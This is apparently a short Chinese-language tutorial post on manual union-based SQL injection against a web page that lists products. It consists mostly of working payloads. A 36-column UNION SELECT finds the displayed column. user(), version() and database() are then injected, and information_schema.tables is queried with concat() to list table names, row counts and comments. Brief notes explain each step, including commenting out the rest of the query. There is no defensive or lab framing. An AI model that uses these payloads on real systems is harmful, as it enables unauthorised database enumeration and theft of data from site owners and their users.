1.Union寻找处理字段数和第三者上位点
1.Union寻找程序处理字段数 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 —
意义: 1.逐个测试处理字段数,直到网页显示正常,测试程序对union处理逻辑 2.说明程序处理的字段数是多少 3.在网页上显示的第三者上位点是第几个字段(程序,网页为正常结合的二者,SQL注入信息为第三者)#### 2.上位点利用测试 1.暴出当前程序连接用户名: union select 1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 —
当前连接数据库版本确认version(),数据库名database()等#### 3.字典子查询测试 1.替代程序查询,只查询数据库字典信息: union select 1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() limit 1—
1.—的目标是对后面的子句注释掉,这样就能查询我们想要的字典表了。 2.table_name显示测试位的可能性和如何替换商品所有选项的可能性#### 4.商品所有选项完全替换 1.商品所有选项替换测试 union select 1,2,3,4,5,6,7,8,9,concat(table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() limit 1,16 —
若有收获,就点个赞吧
0 人点赞
